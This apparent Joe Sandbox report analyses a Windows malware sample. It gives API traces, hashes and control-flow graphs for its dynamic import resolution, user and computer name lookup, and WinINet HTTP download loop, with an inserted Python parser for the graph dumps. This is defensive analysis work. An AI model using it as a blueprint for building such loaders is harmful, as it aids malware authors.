                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: c248f2ab3b221e8149ab55937a00a6ccd2e3a50cdbc4cca3ad9193a93d22bf26
                                        • Instruction ID: 7d0b16b6c39ab3ad93839439d107b9b07fd5387d70958cedee535278fff96341
                                        • Opcode Fuzzy Hash: c248f2ab3b221e8149ab55937a00a6ccd2e3a50cdbc4cca3ad9193a93d22bf26
                                        • Instruction Fuzzy Hash: 67016DB1A04308EBC710DF98ED45BABFBB8FB48B21F10425AEA45F3280D77459448BA1
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: abaf5480555a9bf7331650fa9a5bbcd0180de9f2ee12a649683b86a6c5122ec1
                                        • Instruction ID: 2b6a8ffbba3985c023b497c69c69c83a45558257055455649e509b16d89d5e7f
                                        • Opcode Fuzzy Hash: abaf5480555a9bf7331650fa9a5bbcd0180de9f2ee12a649683b86a6c5122ec1
                                        • Instruction Fuzzy Hash: E3F04FB1944208ABC704DF98DD49BAEFBB8FB08712F10065AFA05A3680D77819048BA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 1667428b634bbc42c0fce042d9e9b701208fa8e89ddf6ad0da53f931e00ee73e
                                        • Instruction ID: cfcc766b4acd3cbf5c972b3e2987b6b7a09e52c6fdb29d910c962bd965e9d6bf
                                        • Opcode Fuzzy Hash: 1667428b634bbc42c0fce042d9e9b701208fa8e89ddf6ad0da53f931e00ee73e
                                        • Instruction Fuzzy Hash: 73D05E7490430CEBCB00DFE0D8496DDBB78FB0C312F000699D90573340EE306881CAA6

                                        Control-flow Graph

                                        control_flow_graph 633 929c10-929c1a 634 929c20-92a031 GetProcAddress * 43 633->634 635 92a036-92a0ca LoadLibraryA * 8 633->635 634->635 636 92a146-92a14d 635->636 637 92a0cc-92a141 GetProcAddress * 5 635->637 638 92a153-92a211 GetProcAddress * 8 636->638 639 92a216-92a21d 636->639 637->636 638->639 640 92a298-92a29f 639->640 641 92a21f-92a293 GetProcAddress * 5 639->641 642 92a337-92a33e 640->642 643 92a2a5-92a332 GetProcAddress * 6 640->643 641->640 644 92a344-92a41a GetProcAddress * 9 642->644 645 92a41f-92a426 642->645 643->642 644->645 646 92a4a2-92a4a9 645->646 647 92a428-92a49d GetProcAddress * 5 645->647 648 92a4ab-92a4d7 GetProcAddress * 2 646->648 649 92a4dc-92a4e3 646->649 647->646 648->649 650 92a515-92a51c 649->650 651 92a4e5-92a510 GetProcAddress * 2 649->651 652 92a612-92a619 650->652 653 92a522-92a60d GetProcAddress * 10 650->653 651->650 654 92a61b-92a678 GetProcAddress * 4 652->654 655 92a67d-92a684 652->655 653->652 654->655 656 92a686-92a699 GetProcAddress 655->656 657 92a69e-92a6a5 655->657 656->657 658 92a6a7-92a703 GetProcAddress * 4 657->658 659 92a708-92a709 657->659 658->659
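The `control_flow_graph` line above is the report's textual dump of the graph image: a node id, the basic block's address range, the API calls and internal `call` targets made in that block (with `* N` when repeated), and `a->b` edges. Read as data it answers questions the picture does not, such as how many imports the routine at 0x929c10 resolves in total and whether a graph contains a loop. The parser below is an added example, not part of the Joe Sandbox report or of the sample; the two input strings are constructed from the page, the first being this routine's graph copied unchanged and the second an excerpt (nodes 1021 to 1024 only) of the WinINet routine's graph, chosen because its edge 1022->910 leaves the excerpt and the parser has to tolerate that. The helper names `parse_cfg`, `api_totals` and `back_edges` are this example's own.

```python
import re
from collections import Counter

# Constructed sample input: the control-flow graph the report prints for the
# import-resolution routine at 0x929c10, copied from the page unchanged.
LOADER_CFG = (
    "control_flow_graph 633 929c10-929c1a 634 929c20-92a031 GetProcAddress * 43 633->634 "
    "635 92a036-92a0ca LoadLibraryA * 8 633->635 634->635 636 92a146-92a14d 635->636 "
    "637 92a0cc-92a141 GetProcAddress * 5 635->637 638 92a153-92a211 GetProcAddress * 8 636->638 "
    "639 92a216-92a21d 636->639 637->636 638->639 640 92a298-92a29f 639->640 "
    "641 92a21f-92a293 GetProcAddress * 5 639->641 642 92a337-92a33e 640->642 "
    "643 92a2a5-92a332 GetProcAddress * 6 640->643 641->640 644 92a344-92a41a GetProcAddress * 9 642->644 "
    "645 92a41f-92a426 642->645 643->642 644->645 646 92a4a2-92a4a9 645->646 "
    "647 92a428-92a49d GetProcAddress * 5 645->647 648 92a4ab-92a4d7 GetProcAddress * 2 646->648 "
    "649 92a4dc-92a4e3 646->649 647->646 648->649 650 92a515-92a51c 649->650 "
    "651 92a4e5-92a510 GetProcAddress * 2 649->651 652 92a612-92a619 650->652 "
    "653 92a522-92a60d GetProcAddress * 10 650->653 651->650 654 92a61b-92a678 GetProcAddress * 4 652->654 "
    "655 92a67d-92a684 652->655 653->652 656 92a686-92a699 GetProcAddress 655->656 "
    "657 92a69e-92a6a5 655->657 656->657 658 92a6a7-92a703 GetProcAddress * 4 657->658 "
    "659 92a708-92a709 657->659 658->659"
)

# Constructed sample input: excerpt (nodes 1021-1024) of the graph for the WinINet
# routine at 0x914880, the part holding the InternetReadFile loop. The edge
# 1022->910 points at a node that is not in the excerpt.
READ_LOOP_CFG = (
    "control_flow_graph 1021 914e32-914e5c InternetReadFile "
    "1022 914e67-914eb9 InternetCloseHandle call 92a800 1021->1022 "
    "1023 914e5e-914e65 1021->1023 1022->910 1023->1022 "
    "1024 914e69-914ea7 call 92a9b0 call 92a8a0 call 92a800 1023->1024 1024->1021"
)

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")


def _count_after(tokens, i):
    """Consume an optional '* N' multiplier starting at tokens[i]; return (N, next index)."""
    if i + 1 < len(tokens) and tokens[i] == "*":
        return int(tokens[i + 1]), i + 2
    return 1, i


def parse_cfg(text):
    """Parse one 'control_flow_graph ...' line into (nodes, edges).

    nodes: node id -> {"start", "end", "apis", "calls"}; the block's address range,
    a Counter of Windows API names and a Counter of internal call targets.
    edges: list of (from_id, to_id), kept even when an endpoint is not in the text.
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            start, _, end = tokens[i + 1].partition("-")
            current = {"start": int(start, 16), "end": int(end or start, 16),
                       "apis": Counter(), "calls": Counter()}
            nodes[int(tok)] = current
            i += 2
        elif current is None:
            raise ValueError(f"unexpected token before the first node: {tok!r}")
        elif tok == "call":
            target = int(tokens[i + 1], 16)
            count, i = _count_after(tokens, i + 2)
            current["calls"][target] += count
        else:
            count, i = _count_after(tokens, i + 1)
            current["apis"][tok] += count
    return nodes, edges


def api_totals(nodes):
    """Total calls per Windows API across every block of the graph."""
    total = Counter()
    for node in nodes.values():
        total.update(node["apis"])
    return total


def back_edges(nodes, edges):
    """Edges whose target starts at or before the source: the loop candidates."""
    return [(a, b) for a, b in edges
            if a in nodes and b in nodes and nodes[b]["start"] <= nodes[a]["start"]]


if __name__ == "__main__":
    nodes, edges = parse_cfg(LOADER_CFG)
    print(f"{len(nodes)} blocks, {len(edges)} edges, API totals: {dict(api_totals(nodes))}")
    print("loops in read excerpt:", back_edges(*parse_cfg(READ_LOOP_CFG)))
```

For the routine at 0x929c10 the totals come out at 104 GetProcAddress calls against 8 LoadLibraryA calls, spread over blocks that each resolve a handful of names, and no back edge, so the routine is a straight-line resolver run once. The excerpt of the WinINet routine, by contrast, has the single back edge 1024->1021, the InternetReadFile loop that reads the response in 0x7CF-byte pieces. Node addresses here are the block start addresses from the dump, so the back-edge test is only a heuristic for compiled code laid out in source order; a compiler that moves a loop body after its exit block would defeat it.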
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,006A57F0), ref: 00929C2D
                                        • GetProcAddress.KERNEL32(74DD0000,006A5730), ref: 00929C45
                                        • GetProcAddress.KERNEL32(74DD0000,006B96A0), ref: 00929C5E
                                        • GetProcAddress.KERNEL32(74DD0000,006B96B8), ref: 00929C76
                                        • GetProcAddress.KERNEL32(74DD0000,006B96D0), ref: 00929C8E
                                        • GetProcAddress.KERNEL32(74DD0000,006B9610), ref: 00929CA7
                                        • GetProcAddress.KERNEL32(74DD0000,006ABD88), ref: 00929CBF
                                        • GetProcAddress.KERNEL32(74DD0000,006BCFF0), ref: 00929CD7
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF90), ref: 00929CF0
                                        • GetProcAddress.KERNEL32(74DD0000,006BCDF8), ref: 00929D08
                                        • GetProcAddress.KERNEL32(74DD0000,006BD0C8), ref: 00929D20
                                        • GetProcAddress.KERNEL32(74DD0000,006A5790), ref: 00929D39
                                        • GetProcAddress.KERNEL32(74DD0000,006A5890), ref: 00929D51
                                        • GetProcAddress.KERNEL32(74DD0000,006A58B0), ref: 00929D69
                                        • GetProcAddress.KERNEL32(74DD0000,006A57D0), ref: 00929D82
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE28), ref: 00929D9A
                                        • GetProcAddress.KERNEL32(74DD0000,006BCFA8), ref: 00929DB2
                                        • GetProcAddress.KERNEL32(74DD0000,006ABAE0), ref: 00929DCB
                                        • GetProcAddress.KERNEL32(74DD0000,006A58D0), ref: 00929DE3
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE40), ref: 00929DFB
                                        • GetProcAddress.KERNEL32(74DD0000,006BCED0), ref: 00929E14
                                        • GetProcAddress.KERNEL32(74DD0000,006BD008), ref: 00929E2C
                                        • GetProcAddress.KERNEL32(74DD0000,006BCEA0), ref: 00929E44
                                        • GetProcAddress.KERNEL32(74DD0000,006A5950), ref: 00929E5D
                                        • GetProcAddress.KERNEL32(74DD0000,006BD0E0), ref: 00929E75
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE58), ref: 00929E8D
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF18), ref: 00929EA6
                                        • GetProcAddress.KERNEL32(74DD0000,006BCEE8), ref: 00929EBE
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE70), ref: 00929ED6
                                        • GetProcAddress.KERNEL32(74DD0000,006BCFC0), ref: 00929EEF
                                        • GetProcAddress.KERNEL32(74DD0000,006BD068), ref: 00929F07
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE88), ref: 00929F1F
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE10), ref: 00929F38
                                        • GetProcAddress.KERNEL32(74DD0000,006BA420), ref: 00929F50
                                        • GetProcAddress.KERNEL32(74DD0000,006BCEB8), ref: 00929F68
                                        • GetProcAddress.KERNEL32(74DD0000,006BD080), ref: 00929F81
                                        • GetProcAddress.KERNEL32(74DD0000,006A58F0), ref: 00929F99
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF00), ref: 00929FB1
                                        • GetProcAddress.KERNEL32(74DD0000,006A5910), ref: 00929FCA
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF60), ref: 00929FE2
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF30), ref: 00929FFA
                                        • GetProcAddress.KERNEL32(74DD0000,006A5970), ref: 0092A013
                                        • GetProcAddress.KERNEL32(74DD0000,006A5B50), ref: 0092A02B
                                        • LoadLibraryA.KERNEL32(006BCF48,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A03D
                                        • LoadLibraryA.KERNEL32(006BCF78,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A04E
                                        • LoadLibraryA.KERNEL32(006BCFD8,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A060
                                        • LoadLibraryA.KERNEL32(006BD020,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A072
                                        • LoadLibraryA.KERNEL32(006BD038,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A083
                                        • LoadLibraryA.KERNEL32(006BD050,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A095
                                        • LoadLibraryA.KERNEL32(006BD098,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A0A7
                                        • LoadLibraryA.KERNEL32(006BD0B0,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A0B8
                                        • GetProcAddress.KERNEL32(75290000,006A5D50), ref: 0092A0DA
                                        • GetProcAddress.KERNEL32(75290000,006BD230), ref: 0092A0F2
                                        • GetProcAddress.KERNEL32(75290000,006B90C8), ref: 0092A10A
                                        • GetProcAddress.KERNEL32(75290000,006BD2A8), ref: 0092A123
                                        • GetProcAddress.KERNEL32(75290000,006A5B90), ref: 0092A13B
                                        • GetProcAddress.KERNEL32(73440000,006AB810), ref: 0092A160
                                        • GetProcAddress.KERNEL32(73440000,006A5B70), ref: 0092A179
                                        • GetProcAddress.KERNEL32(73440000,006ABA18), ref: 0092A191
                                        • GetProcAddress.KERNEL32(73440000,006BD140), ref: 0092A1A9
                                        • GetProcAddress.KERNEL32(73440000,006BD320), ref: 0092A1C2
                                        • GetProcAddress.KERNEL32(73440000,006A5D70), ref: 0092A1DA
                                        • GetProcAddress.KERNEL32(73440000,006A5C10), ref: 0092A1F2
                                        • GetProcAddress.KERNEL32(73440000,006BD3C8), ref: 0092A20B
                                        • GetProcAddress.KERNEL32(752C0000,006A5AB0), ref: 0092A22C
                                        • GetProcAddress.KERNEL32(752C0000,006A5AF0), ref: 0092A244
                                        • GetProcAddress.KERNEL32(752C0000,006BD1B8), ref: 0092A25D
                                        • GetProcAddress.KERNEL32(752C0000,006BD3E0), ref: 0092A275
                                        • GetProcAddress.KERNEL32(752C0000,006A5D90), ref: 0092A28D
                                        • GetProcAddress.KERNEL32(74EC0000,006AB720), ref: 0092A2B3
                                        • GetProcAddress.KERNEL32(74EC0000,006AB9F0), ref: 0092A2CB
                                        • GetProcAddress.KERNEL32(74EC0000,006BD338), ref: 0092A2E3
                                        • GetProcAddress.KERNEL32(74EC0000,006A5B10), ref: 0092A2FC
                                        • GetProcAddress.KERNEL32(74EC0000,006A5C30), ref: 0092A314
                                        • GetProcAddress.KERNEL32(74EC0000,006AB658), ref: 0092A32C
                                        • GetProcAddress.KERNEL32(75BD0000,006BD278), ref: 0092A352
                                        • GetProcAddress.KERNEL32(75BD0000,006A5C50), ref: 0092A36A
                                        • GetProcAddress.KERNEL32(75BD0000,006B9098), ref: 0092A382
                                        • GetProcAddress.KERNEL32(75BD0000,006BD248), ref: 0092A39B
                                        • GetProcAddress.KERNEL32(75BD0000,006BD158), ref: 0092A3B3
                                        • GetProcAddress.KERNEL32(75BD0000,006A5DB0), ref: 0092A3CB
                                        • GetProcAddress.KERNEL32(75BD0000,006A5AD0), ref: 0092A3E4
                                        • GetProcAddress.KERNEL32(75BD0000,006BD2C0), ref: 0092A3FC
                                        • GetProcAddress.KERNEL32(75BD0000,006BD170), ref: 0092A414
                                        • GetProcAddress.KERNEL32(75A70000,006A5DD0), ref: 0092A436
                                        • GetProcAddress.KERNEL32(75A70000,006BD188), ref: 0092A44E
                                        • GetProcAddress.KERNEL32(75A70000,006BD1A0), ref: 0092A466
                                        • GetProcAddress.KERNEL32(75A70000,006BD368), ref: 0092A47F
                                        • GetProcAddress.KERNEL32(75A70000,006BD260), ref: 0092A497
                                        • GetProcAddress.KERNEL32(75450000,006A5C70), ref: 0092A4B8
                                        • GetProcAddress.KERNEL32(75450000,006A5E50), ref: 0092A4D1
                                        • GetProcAddress.KERNEL32(75DA0000,006A5CF0), ref: 0092A4F2
                                        • GetProcAddress.KERNEL32(75DA0000,006BD380), ref: 0092A50A
                                        • GetProcAddress.KERNEL32(6F070000,006A5B30), ref: 0092A530
                                        • GetProcAddress.KERNEL32(6F070000,006A5E30), ref: 0092A548
                                        • GetProcAddress.KERNEL32(6F070000,006A5BD0), ref: 0092A560
                                        • GetProcAddress.KERNEL32(6F070000,006BD1D0), ref: 0092A579
                                        • GetProcAddress.KERNEL32(6F070000,006A5D30), ref: 0092A591
                                        • GetProcAddress.KERNEL32(6F070000,006A5BB0), ref: 0092A5A9
                                        • GetProcAddress.KERNEL32(6F070000,006A5BF0), ref: 0092A5C2
                                        • GetProcAddress.KERNEL32(6F070000,006A5CD0), ref: 0092A5DA
                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0092A5F1
                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0092A607
                                        • GetProcAddress.KERNEL32(75AF0000,006BD350), ref: 0092A629
                                        • GetProcAddress.KERNEL32(75AF0000,006B90D8), ref: 0092A641
                                        • GetProcAddress.KERNEL32(75AF0000,006BD0F8), ref: 0092A659
                                        • GetProcAddress.KERNEL32(75AF0000,006BD2D8), ref: 0092A672
                                        • GetProcAddress.KERNEL32(75D90000,006A5C90), ref: 0092A693
                                        • GetProcAddress.KERNEL32(6FAD0000,006BD398), ref: 0092A6B4
                                        • GetProcAddress.KERNEL32(6FAD0000,006A5CB0), ref: 0092A6CD
                                        • GetProcAddress.KERNEL32(6FAD0000,006BD3B0), ref: 0092A6E5
                                        • GetProcAddress.KERNEL32(6FAD0000,006BD290), ref: 0092A6FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: 0Wj$0[j$0\j$0]j$0^j$HttpQueryInfoA$InternetSetOptionA$PYj$P[j$P\j$P]j$P^j$pYj$p[j$p\j$p]j
                                        • API String ID: 2238633743-3482663418
                                        • Opcode ID: 2046b1f8efdfa64fe08eb910c540718ae06dc2f30a44e56a1bb681f435a33450
                                        • Instruction ID: e2b858503f906f26305b8b19afc1d2b9bb76853b5df5ebbe271c0f710587cd77
                                        • Opcode Fuzzy Hash: 2046b1f8efdfa64fe08eb910c540718ae06dc2f30a44e56a1bb681f435a33450
                                        • Instruction Fuzzy Hash: E16219B5510300AFD344DFA8ED98B663BF9F74C603B14879AA709E3264DE39A841DB13

                                        Control-flow Graph

                                        control_flow_graph 1033 916280-91630b call 92a7a0 call 9147b0 call 92a740 InternetOpenA StrCmpCA 1040 916314-916318 1033->1040 1041 91630d 1033->1041 1042 916509-916525 call 92a7a0 call 92a800 * 2 1040->1042 1043 91631e-916342 InternetConnectA 1040->1043 1041->1040 1062 916528-91652d 1042->1062 1045 916348-91634c 1043->1045 1046 9164ff-916503 InternetCloseHandle 1043->1046 1048 91635a 1045->1048 1049 91634e-916358 1045->1049 1046->1042 1051 916364-916392 HttpOpenRequestA 1048->1051 1049->1051 1053 9164f5-9164f9 InternetCloseHandle 1051->1053 1054 916398-91639c 1051->1054 1053->1046 1055 9163c5-916405 HttpSendRequestA HttpQueryInfoA 1054->1055 1056 91639e-9163bf InternetSetOptionA 1054->1056 1058 916407-916427 call 92a740 call 92a800 * 2 1055->1058 1059 91642c-91644b call 928940 1055->1059 1056->1055 1058->1062 1067 9164c9-9164e9 call 92a740 call 92a800 * 2 1059->1067 1068 91644d-916454 1059->1068 1067->1062 1071 9164c7-9164ef InternetCloseHandle 1068->1071 1072 916456-916480 InternetReadFile 1068->1072 1071->1053 1076 916482-916489 1072->1076 1077 91648b 1072->1077 1076->1077 1080 91648d-9164c5 call 92a9b0 call 92a8a0 call 92a800 1076->1080 1077->1071 1080->1072
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                          • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                                        • StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00916303
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                                        • HttpOpenRequestA.WININET(00000000,GET,?,006BE230,00000000,00000000,00400100,00000000), ref: 00916385
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009163FD
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0091646D
                                        • InternetCloseHandle.WININET(00000000), ref: 009164EF
                                        • InternetCloseHandle.WININET(00000000), ref: 009164F9
                                        • InternetCloseHandle.WININET(00000000), ref: 00916503
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: 0k$ERROR$ERROR$GET
                                        • API String ID: 3749127164-537840719
                                        • Opcode ID: 871e56dd5d06db53c693b9cdb1055ebacd1cdee0100909d6f5c2097972a5421e
                                        • Instruction ID: 99a27a562cf7d962d8201b428589f20fe9ce1602b79b55104f824987cf9c4c86
                                        • Opcode Fuzzy Hash: 871e56dd5d06db53c693b9cdb1055ebacd1cdee0100909d6f5c2097972a5421e
                                        • Instruction Fuzzy Hash: A1713C71E00318ABDB24DFA0DC59BEEB778BB48701F108598F50AAB1D4DBB46A85CF51

                                        Control-flow Graph

